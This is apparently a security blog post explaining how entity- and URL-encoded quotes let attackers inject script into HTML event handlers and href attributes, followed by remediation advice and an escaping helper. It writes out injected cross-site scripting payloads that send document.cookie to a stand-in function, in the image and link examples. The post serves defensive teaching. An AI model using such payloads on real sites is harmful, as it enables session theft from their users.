
It’s a DOM Event

All user input must be properly escaped and encoded to prevent cross-site scripting. While the idea of sanitizing user input is nothing new to most developers, many of them encode special characters and fail to account for how the resulting document will handle the input. HTML encoding without proper escaping can lead to malicious code execution in the DOM.

Be sure to note that all of the following descriptions and comments are dependent on how the application output encodes the related content and, therefore, may not reflect the actual injection.


HTML Events

HTML events serve as a method to execute client-side script when related conditions are met within the contained HTML document. User-supplied input can be encoded in the related HTML; however, when the condition of the event is met, the document will decode the injection before sending it to the javascript engine for interpretation. Consider the example below of an embedded image that evaluates “userInput” when a user clicks on the image:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput');" />

Now here’s the same image that has been hi-jacked by an attacker with an encoded payload:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput&#000000039;);sendHaxor(document.cookie);//');" />

The hacker’s injection uses HTML decimal entity encoding with multiple zeros to show support for padding. When a user interacts with the altered image, the DOM will evaluate the original function, followed by the hacker’s injection, followed by double slashes to clean up any trailing residue from the original syntax. All of the character encodings presented immediately below will work across all current browsers, with the exception of the HTML named entity apostrophe (&apos;) in Internet Explorer.
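You can watch this decoding happen by asking the DOM for the attribute back after the markup has been parsed (a quick console sketch reusing the made-up handler names from above):

// The HTML parser decodes character references in attribute values, so by
// the time the event fires the javascript engine sees real quotes:
var container = document.createElement('div');
container.innerHTML = '<img src="CoolPic.jpg" ' +
  'onclick="doSomethingCool(\'userInput&#000000039;);sendHaxor(document.cookie);//\');">';
console.log(container.firstChild.getAttribute('onclick'));
// -> doSomethingCool('userInput');sendHaxor(document.cookie);//');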


Vulnerable HTML Encoding


Javascript HREF/SRC

When javascript is referenced in either HREF or SRC of an HTML element an attacker can achieve code injection using the same method as above, but with the additional support for URL hex encoding. The DOM will construct the related javascript location before evaluating its contents. Here’s a dynamic link that, when followed, does something “cool” with user input:

<a href="doSomethingCool('userInput');">Cool Link</a>

The hacker likes the “super-cool” link so much that he decides to add his own content to capture the user’s session:

<a href="doSomethingCool('userInput%27);sendHaxor(document.cookie);//');">Cool Link</a>
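Here %27 plays the same role the decimal entity did in the event-handler example. A quick sketch of the decoding the browser applies to the URL before the javascript engine ever sees it:

// %27 is the URL hex encoding of a single quote; the browser decodes the
// URL, so the injected quote closes the original string just as &#39; did:
var href = "doSomethingCool('userInput%27);sendHaxor(document.cookie);//');";
console.log(decodeURIComponent(href));
// -> doSomethingCool('userInput');sendHaxor(document.cookie);//');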


Remediation

The lesson to be learned here is that encoding alone may not be enough to solve cross-site scripting. Therefore, encode all special characters to prevent an attacker from breaking the resulting HTML; escape each character to prevent breaking any related javascript; and, of course, always remember to escape the escapes.

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput\\\&#39;);attackerBlocked();//');" />
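A small helper along these lines (a sketch, not a drop-in sanitizer; production code should rely on a vetted encoding library, and the function names here are made up) makes the two layers explicit: escape for the javascript string context first, then encode for the HTML attribute context:

// Layer 1: escape characters that could break out of a javascript string.
function escapeForJsString(s) {
  return s.replace(/\\/g, '\\\\')   // escape the escapes first
          .replace(/'/g, "\\'")
          .replace(/"/g, '\\"');
}
// Layer 2: encode characters that could break out of the HTML attribute.
function encodeForHtmlAttr(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}
var userInput = "userInput');sendHaxor(document.cookie);//";
var safe = encodeForHtmlAttr(escapeForJsString(userInput));
// safe can now sit inside onclick="doSomethingCool('...')" without the
// injected quote ever reaching the javascript engine unescaped.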

Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.